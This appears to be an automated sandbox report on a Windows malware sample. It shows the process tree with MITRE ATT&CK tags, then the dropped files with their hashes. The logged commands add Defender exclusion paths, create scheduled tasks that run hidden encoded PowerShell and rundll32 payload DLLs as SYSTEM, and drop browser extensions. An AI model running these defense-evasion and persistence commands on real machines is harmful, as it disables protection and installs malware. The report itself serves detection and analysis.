                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\sIbGVlYWmvcsolgye /t REG_DWORD /d 0 /reg:32
                        3⤵
                        • System Location Discovery: System Language Discovery
                        PID:2000
                      • C:\Windows\SysWOW64\reg.exe
                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\sIbGVlYWmvcsolgye /t REG_DWORD /d 0 /reg:64
                        3⤵
                        • System Location Discovery: System Language Discovery
                        PID:4564
                      • C:\Windows\SysWOW64\reg.exe
                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\FqJCjXFBIuEogUFe /t REG_DWORD /d 0 /reg:32
                        3⤵
                        • System Location Discovery: System Language Discovery
                        PID:2764
                      • C:\Windows\SysWOW64\reg.exe
                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\FqJCjXFBIuEogUFe /t REG_DWORD /d 0 /reg:64
                        3⤵
                        • System Location Discovery: System Language Discovery
                        PID:564
                    • C:\Windows\SysWOW64\schtasks.exe
                      schtasks /CREATE /TN "grBBVfolU" /SC once /ST 18:29:05 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                      2⤵
                      • System Location Discovery: System Language Discovery
                      • Scheduled Task/Job: Scheduled Task
                      PID:4576
                    • C:\Windows\SysWOW64\schtasks.exe
                      schtasks /run /I /tn "grBBVfolU"
                      2⤵
                      • System Location Discovery: System Language Discovery
                      PID:2128
                    • C:\Windows\SysWOW64\schtasks.exe
                      schtasks /DELETE /F /TN "grBBVfolU"
                      2⤵
                        PID:3020
                      • C:\Windows\SysWOW64\schtasks.exe
                        schtasks /CREATE /TN "XQczKGmvpzKIPgEdm" /SC once /ST 17:04:12 /RU "SYSTEM" /TR "\"C:\Windows\Temp\FqJCjXFBIuEogUFe\KRbyArVUHKYqACR\gPJBUsb.exe\" uv /bfBDdiddm 385132 /S" /V1 /F
                        2⤵
                        • Drops file in Windows directory
                        • System Location Discovery: System Language Discovery
                        • Scheduled Task/Job: Scheduled Task
                        PID:804
                      • C:\Windows\SysWOW64\schtasks.exe
                        schtasks /run /I /tn "XQczKGmvpzKIPgEdm"
                        2⤵
                          PID:4088
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 4864 -s 936
                          2⤵
                          • Program crash
                          PID:5052
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                        1⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:920
                        • C:\Windows\system32\gpupdate.exe
                          "C:\Windows\system32\gpupdate.exe" /force
                          2⤵
                            PID:4324
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                          1⤵
                            PID:3548
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                            1⤵
                              PID:4428
                            • C:\Windows\system32\gpscript.exe
                              gpscript.exe /RefreshSystemParam
                              1⤵
                                PID:2380
                              • C:\Windows\Temp\FqJCjXFBIuEogUFe\KRbyArVUHKYqACR\gPJBUsb.exe
                                C:\Windows\Temp\FqJCjXFBIuEogUFe\KRbyArVUHKYqACR\gPJBUsb.exe uv /bfBDdiddm 385132 /S
                                1⤵
                                • Checks computer location settings
                                • Executes dropped EXE
                                • Drops Chrome extension
                                • Drops desktop.ini file(s)
                                • Drops file in System32 directory
                                • Drops file in Program Files directory
                                • System Location Discovery: System Language Discovery
                                • Modifies data under HKEY_USERS
                                • Suspicious behavior: EnumeratesProcesses
                                PID:3992
                                • C:\Windows\SysWOW64\schtasks.exe
                                  schtasks /DELETE /F /TN "bvkGxwJeLqTAkHhkNY"
                                  2⤵
                                    PID:1436
                                  • C:\Windows\SysWOW64\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &
                                    2⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:4872
                                    • C:\Windows\SysWOW64\forfiles.exe
                                      forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
                                      3⤵
                                      • Indirect Command Execution
                                      • System Location Discovery: System Language Discovery
                                      PID:1220
                                      • C:\Windows\SysWOW64\cmd.exe
                                        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                        4⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:4592
                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                          5⤵
                                          • Command and Scripting Interpreter: PowerShell
                                          • Drops file in System32 directory
                                          • Modifies data under HKEY_USERS
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:844
                                          • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                            "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                            6⤵
                                            • System Location Discovery: System Language Discovery
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:1540
                                  • C:\Windows\SysWOW64\schtasks.exe
                                    schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\YRgOlsMFU\OlMcKq.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "uLgNQhGVrtTHqep" /V1 /F
                                    2⤵
                                    • Drops file in Windows directory
                                    • Scheduled Task/Job: Scheduled Task
                                    PID:4748
                                  • C:\Windows\SysWOW64\schtasks.exe
                                    schtasks /CREATE /TN "uLgNQhGVrtTHqep2" /F /xml "C:\Program Files (x86)\YRgOlsMFU\MXfQKrY.xml" /RU "SYSTEM"
                                    2⤵
                                    • System Location Discovery: System Language Discovery
                                    • Scheduled Task/Job: Scheduled Task
                                    PID:272
                                  • C:\Windows\SysWOW64\schtasks.exe
                                    schtasks /END /TN "uLgNQhGVrtTHqep"
                                    2⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:1812
                                  • C:\Windows\SysWOW64\schtasks.exe
                                    schtasks /DELETE /F /TN "uLgNQhGVrtTHqep"
                                    2⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:1632
                                  • C:\Windows\SysWOW64\schtasks.exe
                                    schtasks /CREATE /TN "HyjjfZpaqEQTDX" /F /xml "C:\Program Files (x86)\sfNQtIozxBdU2\hylUhfD.xml" /RU "SYSTEM"
                                    2⤵
                                    • Scheduled Task/Job: Scheduled Task
                                    PID:3972
                                  • C:\Windows\SysWOW64\schtasks.exe
                                    schtasks /CREATE /TN "uaQRhjpePlTZw2" /F /xml "C:\ProgramData\TwHQsXvOagBSxrVB\pESZjZu.xml" /RU "SYSTEM"
                                    2⤵
                                    • System Location Discovery: System Language Discovery
                                    • Scheduled Task/Job: Scheduled Task
                                    PID:1512
                                  • C:\Windows\SysWOW64\schtasks.exe
                                    schtasks /CREATE /TN "wDrdCeMDqmDQGcmlN2" /F /xml "C:\Program Files (x86)\pmSQpDXEYtDmaklHKDR\XUUGhuk.xml" /RU "SYSTEM"
                                    2⤵
                                    • System Location Discovery: System Language Discovery
                                    • Scheduled Task/Job: Scheduled Task
                                    PID:2580
                                  • C:\Windows\SysWOW64\schtasks.exe
                                    schtasks /CREATE /TN "AqkBStCNybFeDtcAvir2" /F /xml "C:\Program Files (x86)\uqkcvgprzQBVC\CGJsPTt.xml" /RU "SYSTEM"
                                    2⤵
                                    • Scheduled Task/Job: Scheduled Task
                                    PID:2420
                                  • C:\Windows\SysWOW64\schtasks.exe
                                    schtasks /CREATE /TN "wwyypnBRwRRCZFVct" /SC once /ST 17:04:30 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\FqJCjXFBIuEogUFe\dgHpWThw\GVkcDHD.dll\",#1 /LdideDn 385132" /V1 /F
                                    2⤵
                                    • Drops file in Windows directory
                                    • System Location Discovery: System Language Discovery
                                    • Scheduled Task/Job: Scheduled Task
                                    PID:2320
                                  • C:\Windows\SysWOW64\schtasks.exe
                                    schtasks /run /I /tn "wwyypnBRwRRCZFVct"
                                    2⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:4984
                                  • C:\Windows\SysWOW64\schtasks.exe
                                    schtasks /DELETE /F /TN "XQczKGmvpzKIPgEdm"
                                    2⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:1108
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 3992 -s 2388
                                    2⤵
                                    • Program crash
                                    PID:4088
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 4864 -ip 4864
                                  1⤵
                                    PID:2788
                                  • C:\Windows\system32\rundll32.EXE
                                    C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\FqJCjXFBIuEogUFe\dgHpWThw\GVkcDHD.dll",#1 /LdideDn 385132
                                    1⤵
                                      PID:112
                                      • C:\Windows\SysWOW64\rundll32.exe
                                        C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\FqJCjXFBIuEogUFe\dgHpWThw\GVkcDHD.dll",#1 /LdideDn 385132
                                        2⤵
                                        • Blocklisted process makes network request
                                        • Checks BIOS information in registry
                                        • Loads dropped DLL
                                        • Enumerates system info in registry
                                        • Modifies data under HKEY_USERS
                                        PID:1796
                                        • C:\Windows\SysWOW64\schtasks.exe
                                          schtasks /DELETE /F /TN "wwyypnBRwRRCZFVct"
                                          3⤵
                                            PID:2220
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 3504 -ip 3504
                                        1⤵
                                          PID:4032
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 3992 -ip 3992
                                          1⤵
                                            PID:1336

                                          Network

                                          MITRE ATT&CK Enterprise v15

                                          Replay Monitor

                                          Loading Replay Monitor...

                                          Downloads

                                          • C:\Program Files (x86)\YRgOlsMFU\MXfQKrY.xml

                                            Filesize

                                            2KB

                                            MD5

                                            c382c7ffddabed75ffddde0fec594fad

                                            SHA1

                                            31535eca664b46d622f4dc976340ea4287c814c6

                                            SHA256

                                            6ca967ca840dd985dceda1e51a0c10b00352ded61635442d9da947b273dc74f5

                                            SHA512

                                            2e0a92e4d0e38d5015130234dab60f7090b9c22b048175b29025554b17b0542028c92e0c18e9d8a41230b45c7391a69b1880b01ff0eaff36036d74eb0e370e7e

                                          • C:\Program Files (x86)\pmSQpDXEYtDmaklHKDR\XUUGhuk.xml

                                            Filesize

                                            2KB

                                            MD5

                                            200131d21b3274ac323fb147aac86d19

                                            SHA1

                                            b21da48dfbc3ec81a6d2a34066d29f949fbf22c9

                                            SHA256

                                            19f2935fe6fc503f75515634c451dbc605982a4d994efce29441fa936a930bf2

                                            SHA512

                                            d053d518d75edcaf36460986a9edaf8180930032018feef3d8b4f3f27c170999730d39ef362156c0750e9b796ede811875cefefc142d400d2d0773cecd2e5882

                                          • C:\Program Files (x86)\sfNQtIozxBdU2\hylUhfD.xml

                                            Filesize

                                            2KB

                                            MD5

                                            b4b47f68a761a3cd2b95f170ead898e6

                                            SHA1

                                            b8cc609c5ab7b33ecd3640f1fd978d4f10f15e17

                                            SHA256

                                            9e427ccb53293371fc0f9765a133c6910b2ef8b5da30b78204ba63e8508076d6

                                            SHA512

                                            fc53d6cc3110baa8756838ad9faad88f1abb6689354b84e71b1bf44c5dcda52e0dee1c21eee10cab30fb22d71209585c961f82b6ec701a2481ff260f83318760

                                          • C:\Program Files (x86)\uqkcvgprzQBVC\CGJsPTt.xml

                                            Filesize

                                            2KB

                                            MD5

                                            27e4674b00d53d5357ada5a3384ad9d6

                                            SHA1

                                            9ddc8e56dc19dd3cf0b2ff5ad229c32c91fdeb17

                                            SHA256

                                            50e65ce003a3827b8ad8f811b637502c47f57a933331adec0f838894ccdf7e3c

                                            SHA512

                                            a9b54325de283d46f4630af45de68ebf8f914d336a3f77da0902a9a9dd81911c7b3f7604f7f8065adc270da802f6f10ca13218bc812bb408d0b9c4bf8b23c8b0

                                          • C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi

                                            Filesize

                                            2.5MB

                                            MD5

                                            c258a0091c03afdc7a13a492a3f7325e

                                            SHA1

                                            3a33c076e1be64fe1a60f7b6de66b0978c62ed14

                                            SHA256

                                            ba1dc8a1f4ebb3e905e0efc4a22d771d7c7003d7734292ec0f9b7c2f4fc9b0fc

                                            SHA512

                                            1684770376929fb1fe422eae308d0c3b41711686c6d2f167b7c5c5911dbe8511581f159640d8f3c77e2b5983dbce53280bd2b8eff2680d932df6136a9d4ede76

                                          • C:\ProgramData\TwHQsXvOagBSxrVB\pESZjZu.xml

                                            Filesize

                                            2KB

                                            MD5

                                            4396e28f4a5ec7a114273a01b501a2a0

                                            SHA1

                                            454ad2781854f81c6e581a679d7ac775fdbd07cf

                                            SHA256

                                            9dd7b14817a4178027a0d9bb7b3eccd2bcf14bc40b94eafb1942eef579963326

                                            SHA512

                                            2357047642aed434205509a55c34189410f9c6eb8c2242468b8baff178bb33fe2bc6cc54c89626bd505f69a0065d42bde22c85c43241742621c25471bea15181

                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json

                                            Filesize

                                            187B

                                            MD5

                                            2a1e12a4811892d95962998e184399d8

                                            SHA1

                                            55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720

                                            SHA256

                                            32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb

                                            SHA512

                                            bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json

                                            Filesize

                                            136B

                                            MD5

                                            238d2612f510ea51d0d3eaa09e7136b1

                                            SHA1

                                            0953540c6c2fd928dd03b38c43f6e8541e1a0328

                                            SHA256

                                            801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e

                                            SHA512

                                            2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json

                                            Filesize

                                            150B

                                            MD5

                                            0b1cf3deab325f8987f2ee31c6afc8ea

                                            SHA1

                                            6a51537cef82143d3d768759b21598542d683904

                                            SHA256

                                            0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf

                                            SHA512

                                            5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

                                            Filesize

                                            35KB

                                            MD5

                                            02f314ffa7cace60cccdb6d5e2f10ba0

                                            SHA1

                                            7377ec17971383d104bb597301596be509c754fd

                                            SHA256

                                            2f13b9ae22ae55925ea7cf200ba6ebd8eb164ef81f377dc8ac1b1b960a4739bf

                                            SHA512

                                            49945a5dda5adc5f5992522a3cf904b9143366239e77e580559db1bbd417bfb59609b00fc2edd3635ea776c852cf9759310e4c3e893d6eb1d2182b7833b50de2

                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\geiolieogaichbpfhcannipendgnnbkn\1.0.1_0\_locales\es\messages.json

                                            Filesize

                                            151B

                                            MD5

                                            bd6b60b18aee6aaeb83b35c68fb48d88

                                            SHA1

                                            9b977a5fbf606d1104894e025e51ac28b56137c3

                                            SHA256

                                            b7b119625387857b257dd3f4b20238cdbe6c25808a427f0110bcb0bf86729e55

                                            SHA512

                                            3500b42b17142cd222bc4aa55bf32d719dbd5715ff8d0924f1d75aec4bc6aa8e9ca8435f0b831c73a65cc1593552b9037489294fbf677ba4e1cec1173853e45b

                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                            Filesize

                                            11KB

                                            MD5

                                            aca6fea6f25570197195cde2d15984d5

                                            SHA1

                                            ef089d95c65fde6ebdc39bbec09992727dd97f41

                                            SHA256

                                            ae4b9b41d581523c50df454c3234a33d82e30e47911c8f2b33e2a85a34939670

                                            SHA512

                                            55c04b597e464bf819435e7f7e1fcb0dfdd2f02e90593f11304aceb0ed0db8b38dfe76bc6120897c12a9d8c51e91a1b13cd2ec2e0aad8febe099145330ab4bb7

                                          • C:\Users\Admin\AppData\Local\Temp\7zSDACF.tmp\Install.exe

                                            Filesize

                                            6.4MB

                                            MD5

                                            cf1482a92c78989f948c01ee1c853b13

                                            SHA1

                                            db50a932925e148c97d674094aae3ba9474ffed8

                                            SHA256

                                            68a6682b7f96c4cff60656d93faee2c2c1c11f7e0c0de119c1cde2f572a839e6

                                            SHA512

                                            408ad4db0932e3c753d0b849f133eafbdaf7616ba1ce3646cfaccfff977bda89280986f253c6624a04b84abf52517fb27b975dc3b1ae3b8e8f1c8cf41a75c10c

                                          • C:\Users\Admin\AppData\Local\Temp\7zSDCE3.tmp\Install.exe

                                            Filesize

                                            6.8MB

                                            MD5

                                            c1a36e58069897dea47b818e577a93c0

                                            SHA1

                                            305856f9dae6f3eb16c0203d3c7dac8844261220

                                            SHA256

                                            df535e75411776fa8c923abb78e5c77237b0a2899a2890a399cc19412803d7e8

                                            SHA512

                                            654b746aac9716272159c1acb1f8c5845b71b0f91524946c56bb1e2451159f206b3bc8175f4e839026a38b56fa22b0b271ea73a78174ec0582fa2c5da5ecfae5

                                          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_uvfjzdrk.yah.ps1

                                            Filesize

                                            60B

                                            MD5

                                            d17fe0a3f47be24a6453e9ef58c94641

                                            SHA1

                                            6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                            SHA256

                                            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                            SHA512

                                            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                          • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\b0ht3gr0.default-release\prefs.js

                                            Filesize

                                            9KB

                                            MD5

                                            a22fe86b1faf76e3a5cc2f890fb8a01b

                                            SHA1

                                            bae850ced1dbf16661c7b0982bd9100a4c9a4dfc

                                            SHA256

                                            d8654922823f97acde4c17b6e5c343a551c6a9186d680d406bc2fde40eb94900

                                            SHA512

                                            6f513674e4523f3669c2441effae6a95a828fb10f39fefe5c26f2cf8a104274a89a00848c09cdff9df1cf51a6ce9890e479e84dcbf359900928ea1db38cb8f9c

                                          • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

                                            Filesize

                                            1KB

                                            MD5

                                            aebf4bf6752c28a76f012ad901a1b27e

                                            SHA1

                                            9609832f721f53d59f2d01b9d740649f44f965ea

                                            SHA256

                                            73316c4c39ce34c44aa26ba504def77616d56f1d7e4a4330ce67a3719ba7b7b4

                                            SHA512

                                            dbf3b971ddcb84a3f5c6b76515a6d9f782fd34d109133cf3b1760596ca1b5bf92e6dd11947b430bba77cfc2ef93f8978d90aaba571d7e299a04e01c96428af50

                                          • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                            Filesize

                                            11KB

                                            MD5

                                            7d35e6890db087184529877c4551c975

                                            SHA1

                                            5627bd4a623e76b299498c7e79c05a9076010254

                                            SHA256

                                            55b226956fafa217eaa6b1ea41fbe6fe15cce36102da588b4b978bf9b8bea56f

                                            SHA512

                                            e0406af0d7fbe2f4c2fc5627aff4f597db736b1e794fca57e26dcb944d0115a66f24f3bd16eaae356a77caed1cd358c83ee223fb4c4d7e02f4eb825da2ed9322

                                          • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                            Filesize

                                            11KB

                                            MD5

                                            3e14c56936c3183175cc4276d89a323e

                                            SHA1

                                            2a547b031d27d0e687b86ae95d0346373bd011d9

                                            SHA256

                                            67c555588aae3030f15dc055b3ee659b35ad991299bc9b59707ccca91fd126a3

                                            SHA512

                                            ebf2829fb534fb6ca7099c908ef8e586d5d3923e0017d1912b7e1876e9ce7c8240d7fda7eb1714913a8ebe2ad91c5ca1ac75aef9b00e9bce452dbee734781588

                                          • C:\Windows\Temp\FqJCjXFBIuEogUFe\dgHpWThw\GVkcDHD.dll

                                            Filesize

                                            6.5MB

                                            MD5

                                            409583918969bc7c2eeacd9f6a5a4e75

                                            SHA1

                                            9fa76cc0893b736ae82846e5d52bca26fd9ea5e6

                                            SHA256

                                            6c50365374ee91d815a3e83c27df8ee994f8a4fa494d0dd2f7f8092bfe7ea767

                                            SHA512

                                            fc0dabde48ac7f8bd70c9d87f4588d8d2b1987e8da8795b30a17e19e84cbfbc5215a655f1359e85f3bbb6e2151e7ee9014427ac5c6d0d75893e449ce70e416ca

                                          • C:\Windows\system32\GroupPolicy\Machine\Registry.pol

                                            Filesize

                                            6KB

                                            MD5

                                            50adba0f218c6677a2349d6a6f5acf75

                                            SHA1

                                            6b2f28f1b4a55474a3eae64157828f3114993a64

                                            SHA256

                                            48fc2756a5b6ac4cc91eb87e9c922f8b469283adc8324deced9fbc65f1591a6e

                                            SHA512

                                            67daea01ed36b7794db48880f3c51f0dafe3f3a1443a148c6b21c8f294a64e370928c3ea06fdba6ac0e1b6d3e44fda615a740c8da3fcb190c5c5c679b9e08114

                                          • memory/844-123-0x0000000004410000-0x0000000004767000-memory.dmp

                                            Filesize

                                            3.3MB

                                          • memory/844-137-0x00000000048F0000-0x000000000493C000-memory.dmp

                                            Filesize

                                            304KB

                                          • memory/920-74-0x000001EAA5E70000-0x000001EAA5E92000-memory.dmp

                                            Filesize

                                            136KB

                                          • memory/1308-50-0x00000000053F0000-0x000000000543C000-memory.dmp

                                            Filesize

                                            304KB

                                          • memory/1308-49-0x0000000004950000-0x0000000004CA7000-memory.dmp

                                            Filesize

                                            3.3MB

                                          • memory/1796-486-0x0000000002060000-0x000000000463E000-memory.dmp

                                            Filesize

                                            37.9MB

                                          • memory/3504-16-0x00000000125D3000-0x00000000125D4000-memory.dmp

                                            Filesize

                                            4KB

                                          • memory/3504-12-0x0000000010000000-0x00000000125DE000-memory.dmp

                                            Filesize

                                            37.9MB

                                          • memory/3992-82-0x0000000010000000-0x00000000125DE000-memory.dmp

                                            Filesize

                                            37.9MB

                                          • memory/3992-481-0x0000000003DB0000-0x0000000003E3A000-memory.dmp

                                            Filesize

                                            552KB

                                          • memory/3992-94-0x0000000002D10000-0x0000000002D95000-memory.dmp

                                            Filesize

                                            532KB

                                          • memory/3992-499-0x0000000003E40000-0x0000000003F10000-memory.dmp

                                            Filesize

                                            832KB

                                          • memory/3992-150-0x0000000003520000-0x0000000003584000-memory.dmp

                                            Filesize

                                            400KB

                                          • memory/4128-32-0x0000000006990000-0x00000000069DC000-memory.dmp

                                            Filesize

                                            304KB

                                          • memory/4128-30-0x00000000063C0000-0x0000000006717000-memory.dmp

                                            Filesize

                                            3.3MB

                                          • memory/4128-21-0x00000000061F0000-0x0000000006256000-memory.dmp

                                            Filesize

                                            408KB

                                          • memory/4128-20-0x0000000006180000-0x00000000061E6000-memory.dmp

                                            Filesize

                                            408KB

                                          • memory/4128-19-0x0000000005A50000-0x0000000005A72000-memory.dmp

                                            Filesize

                                            136KB

                                          • memory/4128-31-0x00000000068F0000-0x000000000690E000-memory.dmp

                                            Filesize

                                            120KB

                                          • memory/4128-18-0x0000000005B50000-0x000000000617A000-memory.dmp

                                            Filesize

                                            6.2MB

                                          • memory/4128-17-0x0000000005440000-0x0000000005476000-memory.dmp

                                            Filesize

                                            216KB

                                          • memory/4864-37-0x0000000010000000-0x00000000125DE000-memory.dmp

                                            Filesize

                                            37.9MB